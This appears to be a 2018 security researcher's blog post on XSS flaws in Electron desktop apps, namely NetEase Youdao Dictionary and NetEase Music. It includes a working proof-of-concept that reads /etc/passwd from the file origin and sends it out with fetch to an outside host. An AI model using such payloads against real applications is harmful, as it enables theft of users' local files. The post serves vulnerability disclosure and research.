[+] Author:MagicBlue
[+] Team: NeSE security team
[+] From: https://magicbluech.github.io
[+] Create: 2018-06-22

Introduction

Recently, I was studying lambda(function as a service) and Machine Learning, and I will share with you the case of security.
Today I will share two sweet foods about electron.

“If you can build a website, you can build a desktop app. Electron is a framework for creating native applications with web technologies like JavaScript, HTML, and CSS. It takes care of the hard parts so you can focus on the core of your application.”

XSS In NetEase Youdao Dictionary

The first case was when I used a dictionary to look up words. NetEase Youdao dictionary has a built-in browser, we can drag files into it. We can drag an html file into it. This led to the XSS vulnerability. It’s really interesting.

payload.html
1
2
3
<script>
prompt(1,document.location.href)
</script>

demo1

We can see that it is under the file origin. So we try to read other files on the computer

exp.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<script>

const getFile = ()=>{

fetch("/etc/passwd").then(res=>{
return res.text()
}).then(text=>{

sendFile(text);
})
}

const sendFile = (text)=>{
fetch(`https://blue.exeye.io/?file=${encodeURIComponent(text)}`)
}
getFile();
</script>

This is very interesting because it is under modern browsers. The file domain name also follows the same origin policy. If it is under a modern browser such as chrome firefox safari. It is not allowed to read files across directories.

chrome url file:// document.origin = null
firefox url file:// document.origin = undefined
safari url file:// document.origin = null

After we can read the victim’s file, we can read .git to read all the victim’s files in Mac OS.

XSS In Netease Music

NetEase cloud music was cracked by others using XSS vulnerabilities. Netease Cloud repaired part. In the process of my reverse of the client. I found a strict CSP strategy for developers to fix the program. Although developers fixed bugs, I found similar vulnerability.

I can’t bypass the CSP strategy.

In Conclusion

XSS not only exists in web pages, it also exists in the electron framework if you find an XSS application in the desktop. Try to find the privileged domain and determine if it is under the file domain. There may be RCE vulnerabilities in privileged domains and arbitrary read vulnerabilities may occur in the file domain.

There are also many XSS vulnerabilities that exist in desktop applications. Here only an attack surface is shown to everyone. This is just a dessert. Please wait for me to take the next study.

NetEase Youdao Dictionary Version: 2.3.1 (158)
Netease Music Version: 1.5.9 (622)